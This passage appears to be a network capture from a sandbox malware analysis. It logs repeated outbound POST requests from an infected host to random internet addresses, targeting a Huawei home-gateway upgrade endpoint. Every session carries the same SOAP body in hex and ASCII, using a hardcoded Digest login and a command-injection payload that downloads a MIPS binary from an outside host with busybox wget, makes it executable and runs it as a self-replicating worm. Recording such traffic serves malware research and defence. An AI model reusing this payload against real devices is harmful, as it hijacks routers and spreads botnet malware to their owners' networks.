2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2145192.168.2.155618441.137.197.12237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:23.193588972 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2146192.168.2.1534504197.70.34.16537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:23.194114923 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2147192.168.2.1560892117.48.28.14837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:23.196299076 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2148192.168.2.1552282157.167.119.15137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:23.196317911 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2149192.168.2.154726480.199.49.11737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:23.201589108 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2150192.168.2.1552484197.38.206.4237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:24.101990938 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2151192.168.2.155759441.178.168.13337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:24.102777004 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2152192.168.2.1557356157.108.36.21037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:24.102804899 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2153192.168.2.1533552197.97.53.4937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:24.102828979 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2154192.168.2.1548510197.77.120.11537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:24.107115984 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2155192.168.2.1557608197.81.84.17937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:24.107146978 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
